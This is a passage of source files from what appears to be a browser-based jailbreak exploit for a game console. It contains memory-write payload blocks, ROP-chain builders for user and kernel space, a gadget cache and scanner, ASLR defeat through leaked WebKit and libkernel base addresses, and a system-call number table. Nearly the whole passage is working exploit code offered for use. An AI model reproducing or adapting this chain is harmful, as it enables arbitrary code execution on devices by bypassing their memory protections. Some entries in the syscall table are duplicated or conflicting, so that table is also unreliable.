673 | 	p.write4(reactPSPlus.add32(0x00000a7c), 0x00000000);
674 | 	p.write4(reactPSPlus.add32(0x00000a80), 0x26200c60);
675 | 	p.write4(reactPSPlus.add32(0x00000a84), 0x00000009);
676 | 	p.write4(reactPSPlus.add32(0x00000a88), 0x6ffffef5);
677 | 	p.write4(reactPSPlus.add32(0x00000a8c), 0x00000000);
678 | 	p.write4(reactPSPlus.add32(0x00000a90), 0x26200a50);
679 | 	p.write4(reactPSPlus.add32(0x00000a94), 0x00000009);
680 | 	p.write4(reactPSPlus.add32(0x00000a98), 0x00000005);
681 | 	p.write4(reactPSPlus.add32(0x00000a9c), 0x00000000);
682 | 	p.write4(reactPSPlus.add32(0x00000aa0), 0x26200a48);
683 | 	p.write4(reactPSPlus.add32(0x00000aa4), 0x00000009);
684 | 	p.write4(reactPSPlus.add32(0x00000aa8), 0x00000006);
685 | 	p.write4(reactPSPlus.add32(0x00000aac), 0x00000000);
686 | 	p.write4(reactPSPlus.add32(0x00000ab0), 0x26200a30);
687 | 	p.write4(reactPSPlus.add32(0x00000ab4), 0x00000009);
688 | 	p.write4(reactPSPlus.add32(0x00000ab8), 0x0000000a);
689 | 	p.write4(reactPSPlus.add32(0x00000abc), 0x00000000);
690 | 	p.write4(reactPSPlus.add32(0x00000ac0), 0x00000001);
691 | 	p.write4(reactPSPlus.add32(0x00000ac4), 0x00000000);
692 | 	p.write4(reactPSPlus.add32(0x00000ac8), 0x0000000b);
693 | 	p.write4(reactPSPlus.add32(0x00000acc), 0x00000000);
694 | 	p.write4(reactPSPlus.add32(0x00000ad0), 0x00000018);
695 | 	p.write4(reactPSPlus.add32(0x00000ad4), 0x00000000);
696 | 	p.write4(reactPSPlus.add32(0x00000ad8), 0x00000015);
697 | 	p.write4(reactPSPlus.add32(0x00000adc), 0x00000000);
698 | 	p.write4(reactPSPlus.add32(0x00000ae0), 0x00000000);
699 | 	p.write4(reactPSPlus.add32(0x00000ae4), 0x00000000);
700 | 	p.write4(reactPSPlus.add32(0x00000ae8), 0x00000007);
701 | 	p.write4(reactPSPlus.add32(0x00000aec), 0x00000000);
702 | 	p.write4(reactPSPlus.add32(0x00000af0), 0x26200a70);
703 | 	p.write4(reactPSPlus.add32(0x00000af4), 0x00000009);
704 | 	p.write4(reactPSPlus.add32(0x00000af8), 0x00000008);
705 | 	p.write4(reactPSPlus.add32(0x00000afc), 0x00000000);
706 | 	p.write4(reactPSPlus.add32(0x00000b00), 0x00000018);
707 | 	p.write4(reactPSPlus.add32(0x00000b04), 0x00000000);
708 | 	p.write4(reactPSPlus.add32(0x00000b08), 0x00000009);
709 | 	p.write4(reactPSPlus.add32(0x00000b0c), 0x00000000);
710 | 	p.write4(reactPSPlus.add32(0x00000b10), 0x00000018);
711 | 	p.write4(reactPSPlus.add32(0x00000b14), 0x00000000);
712 | 	p.write4(reactPSPlus.add32(0x00000b18), 0x0000001e);
713 | 	p.write4(reactPSPlus.add32(0x00000b1c), 0x00000000);
714 | 	p.write4(reactPSPlus.add32(0x00000b20), 0x00000008);
715 | 	p.write4(reactPSPlus.add32(0x00000b24), 0x00000000);
716 | 	p.write4(reactPSPlus.add32(0x00000b28), 0x6ffffffb);
717 | 	p.write4(reactPSPlus.add32(0x00000b2c), 0x00000000);
718 | 	p.write4(reactPSPlus.add32(0x00000b30), 0x08000001);
719 | 	p.write4(reactPSPlus.add32(0x00000b34), 0x00000000);
720 | 	p.write4(reactPSPlus.add32(0x00000b38), 0x6ffffff9);
721 | 	p.write4(reactPSPlus.add32(0x00000b3c), 0x00000000);
722 | 	p.write4(reactPSPlus.add32(0x00000b40), 0x00000001);
723 | 	p.write4(reactPSPlus.add32(0x00000b44), 0x00000000);
724 | 	p.write4(reactPSPlus.add32(0x00000b48), 0x00000000);
725 | 	p.write4(reactPSPlus.add32(0x00000b4c), 0x00000000);
726 | 	p.write4(reactPSPlus.add32(0x00000b50), 0x00000000);
727 | 	p.write4(reactPSPlus.add32(0x00000b54), 0x00000000);
728 | 	p.write4(reactPSPlus.add32(0x00000b58), 0x00000000);
729 | 	p.write4(reactPSPlus.add32(0x00000b5c), 0x00000000);
730 | 	p.write4(reactPSPlus.add32(0x00000b60), 0x00000000);
731 | 	p.write4(reactPSPlus.add32(0x00000b64), 0x00000000);
732 | 	p.write4(reactPSPlus.add32(0x00000b68), 0x00000000);
733 | 	p.write4(reactPSPlus.add32(0x00000b6c), 0x00000000);
734 | 	p.write4(reactPSPlus.add32(0x00000b70), 0x00000000);
735 | 	p.write4(reactPSPlus.add32(0x00000b74), 0x00000000);
736 | 	p.write4(reactPSPlus.add32(0x00000b78), 0x00000000);
737 | 	p.write4(reactPSPlus.add32(0x00000b7c), 0x00000000);
738 | 	p.write4(reactPSPlus.add32(0x00000b80), 0x00000000);
739 | 	p.write4(reactPSPlus.add32(0x00000b84), 0x00000000);
740 | 	p.write4(reactPSPlus.add32(0x00000b88), 0x00000000);
741 | 	p.write4(reactPSPlus.add32(0x00000b8c), 0x00000000);
742 | 	p.write4(reactPSPlus.add32(0x00000b90), 0x00000000);
743 | 	p.write4(reactPSPlus.add32(0x00000b94), 0x00000000);
744 | 	p.write4(reactPSPlus.add32(0x00000b98), 0x26200c60);
745 | 	p.write4(reactPSPlus.add32(0x00000b9c), 0x00000009);
746 | 	p.write4(reactPSPlus.add32(0x00000ba0), 0x26200a88);
747 | 	p.write4(reactPSPlus.add32(0x00000ba4), 0x00000009);
748 | 	p.write4(reactPSPlus.add32(0x00000ba8), 0x00000000);
749 | 	p.write4(reactPSPlus.add32(0x00000bac), 0x00000000);
750 | 	p.write4(reactPSPlus.add32(0x00000bb0), 0x00000000);
751 | 	p.write4(reactPSPlus.add32(0x00000bb4), 0x00000000);
752 |   }


--------------------------------------------------------------------------------
/www/rop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
 93 |       this.push(gadgets["pop rdi"]);
 94 |       this.push(where);
 95 |       this.push(gadgets["pop rsi"]);
 96 |       this.push(what);
 97 |       this.push(gadgets["mov [rdi], rsi"]);
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]);
104 |       this.push(rdi);
105 |     }
106 | 
107 |     if (rsi != undefined) {
108 |       this.push(gadgets["pop rsi"]);
109 |       this.push(rsi);
110 |     }
111 | 
112 |     if (rdx != undefined) {
113 |       this.push(gadgets["pop rdx"]);
114 |       this.push(rdx);
115 |     }
116 | 
117 |     if (rcx != undefined) {
118 |       this.push(gadgets["pop rcx"]);
119 |       this.push(rcx);
120 |     }
121 | 
122 |     if (r8 != undefined) {
123 |       this.push(gadgets["pop r8"]);
124 |       this.push(r8);
125 |     }
126 |     
127 |     if (r9 != undefined) {
128 |       this.push(gadgets["pop r9"]);
129 |       this.push(r9);
130 |     }
131 | 
132 |     this.push(rip);
133 |     return this;
134 |   }
135 |   
136 |   this.run = function() {
137 |       var retv = p.loadchain(this, this.notimes);
138 |       this.clear();
139 |       return retv;
140 |   }
141 |   
142 |   return this;
143 | };


--------------------------------------------------------------------------------
/www/syscalls.js:
--------------------------------------------------------------------------------
  1 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113,
 81 |   "sys_sendmsg": 114,
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125,
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
101 |   "sys_getpeername": 141,
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
146 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
180 |   "sys_thr_new": 455,
181 |   "sys_sigqueue": 456,
182 |   "sys_thr_set_name": 464,
183 |   "sys_rtprio_thread": 466,
184 |   "sys_pread": 475,
185 |   "sys_pwrite": 476,
186 |   "sys_mmap": 477,
187 |   "sys_lseek": 478,
188 |   "sys_truncate": 479,
189 |   "sys_ftruncate": 480,
190 |   "sys_thr_kill2": 481,
191 |   "sys_shm_open": 482,
192 |   "sys_shm_unlink": 483,
193 |   "sys_cpuset_getid": 486,
194 |   "sys_cpuset_getaffinity": 487,
195 |   "sys_cpuset_setaffinity": 488,
196 |   "sys_openat": 499,
197 |   "sys_pselect": 522,
198 | 
199 |   "sys_regmgr_call": 532,
200 |   "sys_jitshm_create": 533,
201 |   "sys_jitshm_alias": 534,
202 |   "sys_dl_get_list": 535,
203 |   "sys_dl_get_info": 536,
204 |   "sys_dl_notify_event": 537,
205 |   "sys_evf_create": 538,
206 |   "sys_evf_delete": 539,
207 |   "sys_evf_open": 540,
208 |   "sys_evf_close": 541,
209 |   "sys_evf_wait": 542,
210 |   "sys_evf_trywait": 543,
211 |   "sys_evf_set": 544,
212 |   "sys_evf_clear": 545,
213 |   "sys_evf_cancel": 546,
214 |   "sys_query_memory_protection": 47,
215 |   "sys_batch_map": 548,
216 |   "sys_osem_create": 549,
217 |   "sys_osem_delete": 550,
218 |   "sys_osem_open": 551,
219 |   "sys_osem_close": 552,
220 |   "sys_osem_wait": 553,
221 |   "sys_osem_trywait": 554,
222 |   "sys_osem_post": 555,
223 |   "sys_osem_cancel": 556,
224 |   "sys_namedobj_create": 557,
225 |   "sys_namedobj_delete": 558,
226 |   "sys_set_vm_container": 559,
227 |   "sys_debug_init": 560,
228 |   "sys_suspend_process": 561,
229 |   "sys_resume_process": 562,
230 |   "sys_opmc_enable": 563,
231 |   "sys_opmc_disable": 564,
232 |   "sys_opmc_set_ctl": 565,
233 |   "sys_opmc_set_ctr": 566,
234 |   "sys_opmc_get_ctr": 567,
235 |   "sys_budget_create": 568,
236 |   "sys_budget_delete": 569,
237 |   "sys_budget_get": 570,
238 |   "sys_budget_set": 571,
239 |   "sys_virtual_query": 572,
240 |   "sys_mdbg_call": 573,
241 |   "sys_sblock_create": 574,
242 |   "sys_sblock_delete": 575,
243 |   "sys_sblock_enter": 576,
244 |   "sys_sblock_exit": 577,
245 |   "sys_sblock_xenter": 578,
246 |   "sys_sblock_xexit": 579,
247 |   "sys_eport_create": 580,
248 |   "sys_eport_delete": 581,
249 |   "sys_eport_trigger": 582,
250 |   "sys_eport_open": 583,
251 |   "sys_eport_close": 584,
252 |   "sys_is_in_sandbox": 585,
253 |   "sys_dmem_container": 586,
254 |   "sys_get_authinfo": 587,
255 |   "sys_mname": 588,
256 |   "sys_dynlib_dlopen": 589,
257 |   "sys_dynlib_dlclose": 590,
258 |   "sys_dynlib_dlsym": 591,
259 |   "sys_dynlib_get_list": 592,
260 |   "sys_dynlib_get_info": 593,
261 |   "sys_dynlib_load_prx": 594,
262 |   "sys_dynlib_unload_prx": 595,
263 |   "sys_dynlib_do_copy_relocations": 596,
264 |   "sys_dynlib_prepare_dlclose": 597,
265 |   "sys_dynlib_get_proc_param": 598,
266 |   "sys_dynlib_process_needed_and_relocate": 599,
267 |   "sys_sandbox_path": 600,
268 |   "sys_mdbg_service": 601,
269 |   "sys_randomized_path": 602,
270 |   "sys_rdup": 603,
271 |   "sys_dl_get_metadata": 604,
272 |   "sys_workaround8849": 605,
273 |   "sys_is_development_mode": 606,
274 |   "sys_get_self_auth_info": 607,
275 |   "sys_dynlib_get_info_ex": 608,
276 |   "sys_budget_get_ptype": 610,
277 |   "sys_budget_getid": 609,
278 |   "sys_get_paging_stats_of_all_threads": 611,
279 |   "sys_get_proc_type_info": 612,
280 |   "sys_get_resident_count": 613,
281 |   "sys_prepare_to_suspend_process": 614,
282 |   "sys_get_resident_fmem_count": 615,
283 |   "sys_thr_get_name": 616,
284 |   "sys_set_gpo": 617,
285 |   "sys_get_paging_stats_of_all_objects": 618,
286 |   "sys_test_debug_rwmem": 619,
287 |   "sys_free_stack": 620,
288 |   "sys_suspend_system": 621,
289 |   "sys_ipmimgr_call": 622,
290 |   "sys_get_gpo": 623,
291 |   "sys_get_vm_map_timestamp": 624,
292 |   "sys_opmc_set_hw": 625,
293 |   "sys_opmc_get_hw": 626,
294 |   "sys_get_cpu_usage_all": 627,
295 |   "sys_mmap_dmem": 628,
296 |   "sys_physhm_open": 629,
297 |   "sys_physhm_unlink": 630,
298 |   "sys_resume_internal_hdd": 631,
299 |   "sys_thr_suspend_ucontext": 632,
300 |   "sys_thr_resume_ucontext": 633,
301 |   "sys_thr_get_ucontext": 634,
302 |   "sys_thr_set_ucontext": 635,
303 |   "sys_set_timezone_info": 636,
304 |   "sys_set_phys_fmem_limit": 637,
305 |   "sys_utc_to_localtime": 638,
306 |   "sys_localtime_to_utc": 639,
307 |   "sys_set_uevt": 640,
308 |   "sys_get_cpu_usage_proc": 641,
309 |   "sys_get_map_statistics": 642,
310 |   "sys_set_chicken_switches": 643,
311 |   "sys_extend_page_table_pool": 644,
312 |   "sys_645": 645,
313 |   "sys_get_kernel_mem_statistics": 646,
314 |   "sys_get_sdk_compiled_version": 647,
315 |   "sys_app_state_change": 648,
316 |   "sys_dynlib_get_obj_member": 649,
317 |   "sys_budget_get_ptype_of_budget": 650,
318 |   "sys_prepare_to_resume_process": 651,
319 |   "sys_process_terminate": 652,
320 |   "sys_blockpool_open": 653,
321 |   "sys_blockpool_map": 654,
322 |   "sys_blockpool_unmap": 655,
323 |   "sys_dynlib_get_info_for_libdbg": 656,
324 |   "sys_blockpool_batch": 657,
325 |   "sys_fdatasync": 658,
326 |   "sys_dynlib_get_list2": 659,
327 |   "sys_dynlib_get_info2": 660,
328 |   "sys_aio_submit": 661,
329 |   "sys_aio_multi_delete": 662,
330 |   "sys_aio_multi_wait": 663,
331 |   "sys_aio_multi_poll": 664,
332 |   "sys_aio_get_data": 655,
333 |   "sys_aio_multi_cancel": 666,
334 |   "sys_get_bio_usage_all": 667,
335 |   "sys_aio_create": 668,
336 |   "sys_aio_submit_cmd": 669,
337 |   "sys_aio_init": 670,
338 |   "sys_get_page_table_stats": 671,
339 |   "sys_dynlib_get_list_for_libdbg": 672
340 | }
341 | 


--------------------------------------------------------------------------------
/www/userland.js:
--------------------------------------------------------------------------------
  1 | var p;
  2 | 
  3 | var print = function (x) {
  4 |   document.getElementById("console").innerText += x + "\n";
  5 | }
  6 | var print = function (string) { // like print but html
  7 |   document.getElementById("console").innerHTML += string + "\n";
  8 | }
  9 | 
 10 | var get_jmptgt = function (addr) {
 11 |   var z = p.read4(addr) & 0xFFFF;
 12 |   var y = p.read4(addr.add32(2));
 13 |   if (z != 0x25ff) return 0;
 14 | 
 15 |   return addr.add32(y + 6);
 16 | }
 17 | 
 18 | var gadgetmap_wk = {
 19 |   "ep": [0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3],
 20 |   "pop rsi": [0x5e, 0xc3],
 21 |   "pop rdi": [0x5f, 0xc3],
 22 |   "pop rsp": [0x5c, 0xc3],
 23 |   "pop rax": [0x58, 0xc3],
 24 |   "pop rdx": [0x5a, 0xc3],
 25 |   "pop rcx": [0x59, 0xc3],
 26 |   "pop rsp": [0x5c, 0xc3],
 27 |   "pop rbp": [0x5d, 0xc3],
 28 |   "pop r8": [0x47, 0x58, 0xc3],
 29 |   "pop r9": [0x47, 0x59, 0xc3],
 30 |   "infloop": [0xeb, 0xfe, 0xc3],
 31 |   "ret": [0xc3],
 32 |   "mov [rdi], rsi": [0x48, 0x89, 0x37, 0xc3],
 33 |   "mov [rax], rsi": [0x48, 0x89, 0x30, 0xc3],
 34 |   "mov [rdi], rax": [0x48, 0x89, 0x07, 0xc3],
 35 |   "mov rax, rdi": [0x48, 0x89, 0xf8, 0xc3]
 36 | };
 37 | 
 38 | var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0];
 39 | slowpath_jop.reverse();
 40 | 
 41 | var gadgets;
 42 | window.stage2 = function () {
 43 |   try {
 44 |     window.stage2_();
 45 |   } catch (e) {
 46 |     print(e);
 47 |   }
 48 | }
 49 | 
 50 | gadgetcache = {
 51 |   "ret":                    0x0000003C,
 52 |   "jmp rax":                0x00000082,
 53 |   "ep":                     0x000000AD,
 54 |   "pop rbp":                0x000000B6,
 55 |   "mov [rdi], rax":         0x003ADAEB,
 56 |   "pop r8":                 0x000179C5,
 57 |   "pop rax":                0x000043F5,
 58 |   "mov rax, rdi":           0x000058D0,
 59 |   "mov rax, [rax]":         0x0006C83A,
 60 |   "pop rsi":                0x0008F38A,
 61 |   "pop rdi":                0x00038DBA,
 62 |   "pop rcx":                0x00052E59,
 63 |   "pop rsp":                0x0001E687,
 64 |   "mov [rdi], rsi":         0x00023AC2,
 65 |   "mov [rax], rsi":         0x00256667,
 66 |   "pop rdx":                0x001BE024,
 67 |   "pop r9":                 0x00BB320F,
 68 |   "jop":                    0x000C37D0,
 69 |   "infloop":                0x01545EAA,
 70 | 
 71 |   "add rax, rcx":           0x000156DB,
 72 |   "add rax, rsi":           0x001520C6,
 73 |   "and rax, rsi":           0x01570B9F,
 74 |   "mov rdx, rax":           0x00353B31,
 75 |   "mov rdi, rax":           0x015A412F,
 76 |   "mov rax, rdx":           0x001CEF20,
 77 |   "jmp rdi":                0x00295E7E,
 78 | 
 79 |   // Used for kernel exploit stuff
 80 |   "mov rbp, rsp":           0x000F094A,
 81 |   "mov rax, [rdi]":         0x00046EF9,
 82 |   "add rdi, rax":           0x005557DF,
 83 |   "add rax, rsi":           0x001520C6,
 84 |   "and rax, rsi":           0x01570B9F,
 85 |   "jmp rdi":                0x00295E7E,
 86 | };
 87 | 
 88 | window.stage2_ = function () {
 89 |   p = window.prim;
 90 | 
 91 |   p.leakfunc = function (func) {
 92 |     var fptr_store = p.leakval(func);
 93 |     return (p.read8(fptr_store.add32(0x18))).add32(0x40);
 94 |   }
 95 | 
 96 |   var parseFloatStore = p.leakfunc(parseFloat);
 97 |   var parseFloatPtr = p.read8(parseFloatStore);
 98 |   var webKitBase = p.read8(parseFloatStore);
 99 |   window.webKitBase = webKitBase;
100 | 
101 |   webKitBase.low &= 0xfffff000;
102 |   webKitBase.sub32inplace(0x59c000 - 0x24000);
103 | 
104 |   var o2wk = function (o) {
105 |     return webKitBase.add32(o);
106 |   }
107 | 
108 |   gadgets = {
109 |     "stack_chk_fail": o2wk(0xc8),
110 |     "memset": o2wk(0x228),
111 |     "setjmp": o2wk(0x14f8)
112 |   };
113 | 
114 |   var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));
115 |   libSceLibcInternalBase.low &= 0xfffff000;
116 |   libSceLibcInternalBase.sub32inplace(0x20000);
117 | 
118 |   var libKernelBase = p.read8(get_jmptgt(gadgets.stack_chk_fail));
119 |   window.libKernelBase = libKernelBase;
120 |   libKernelBase.low &= 0xfffff000;
121 |   libKernelBase.sub32inplace(0xd000 + 0x4000);
122 | 
123 |   var o2lk = function (o) {
124 |     return libKernelBase.add32(o);
125 |   }
126 | 
127 |   window.o2lk = o2lk;
128 | 
129 |   var wkview = new Uint8Array(0x1000);
130 |   var wkstr = p.leakval(wkview).add32(0x10);
131 |   var orig_wkview_buf = p.read8(wkstr);
132 | 
133 |   p.write8(wkstr, webKitBase);
134 |   p.write4(wkstr.add32(8), 0x367c000);
135 | 
136 |   var gadgets_to_find = 0;
137 |   var gadgetnames = [];
138 |   for (var gadgetname in gadgetmap_wk) {
139 |     if (gadgetmap_wk.hasOwnProperty(gadgetname)) {
140 |       gadgets_to_find++;
141 |       gadgetnames.push(gadgetname);
142 |       gadgetmap_wk[gadgetname].reverse();
143 |     }
144 |   }
145 | 
146 |   gadgets_to_find++;
147 | 
148 |   var findgadget = function (donecb) {
149 |     if (gadgetcache) {
150 |       gadgets_to_find = 0;
151 |       slowpath_jop = 0;
152 | 
153 |       for (var gadgetname in gadgetcache) {
154 |         if (gadgetcache.hasOwnProperty(gadgetname)) {
155 |           gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);
156 |         }
157 |       }
158 |     } else {
159 |       for (var i = 0; i < wkview.length; i++) {
160 |         if (wkview[i] == 0xc3) {
161 |           for (var nl = 0; nl < gadgetnames.length; nl++) {
162 |             var found = 1;
163 |             if (!gadgetnames[nl]) continue;
164 |             var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];
165 |             for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) {
166 |               if (gadgetbytes[compareidx] != wkview[i - compareidx]) {
167 |                 found = 0;
168 |                 break;
169 |               }
170 |             }
171 |             if (!found) continue;
172 |             gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);
173 |             gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;
174 |             delete gadgetnames[nl];
175 |             gadgets_to_find--;
176 |           }
177 |         } else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) {
178 |           var found = 1;
179 |           for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) {
180 |             if (slowpath_jop[compareidx] != wkview[i - compareidx]) {
181 |               found = 0;
182 |               break;
183 |             }
184 |           }
185 |           if (!found) continue;
186 |           gadgets["jop"] = o2wk(i - slowpath_jop.length + 1);
187 |           gadgetoffs["jop"] = i - slowpath_jop.length + 1;
188 |           gadgets_to_find--;
189 |           slowpath_jop = 0;
190 |         }
191 | 
192 |         if (!gadgets_to_find) break;
193 |       }
194 |     }
